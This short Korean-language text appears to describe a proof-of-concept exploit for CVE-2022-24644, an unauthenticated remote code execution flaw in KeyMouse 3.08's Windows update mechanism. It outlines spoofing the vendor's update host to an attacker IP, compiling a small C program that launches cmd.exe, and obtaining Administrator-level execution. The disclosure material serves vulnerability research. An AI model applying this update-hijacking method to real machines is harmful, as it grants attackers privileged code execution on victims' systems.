
KeyMouse Windows 3.08 업데이트 메커니즘에 대한 DNS 스푸핑을 통해 인증 없는 원격 코드 실행을 시연하는 CVE-2022-24644용 개념 증명 익스플로잇.
ZZ Inc. KeyMouse 3.08 (Windows) 인증되지 않은 업데이트 원격 코드 실행 취약점
사용법: python3 cve-2022-24644_poc.py
세부 내용은 gerr.re의 보고서를 참조하세요.
www.keymouse.com이 공격자 IP를 가리키도록 스푸핑합니다;
c:\windows\system32\drivers\etc\hosts를 편집하는 것이 가장 쉽습니다.
proof.c를 컴파일합니다(예: i686-w64-mingw32-gcc proof.c -o proof.exe 사용);#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
결과적으로 proof.exe는 높은 무결성 수준의 Administrator 사용자 컨텍스트에서 실행됩니다.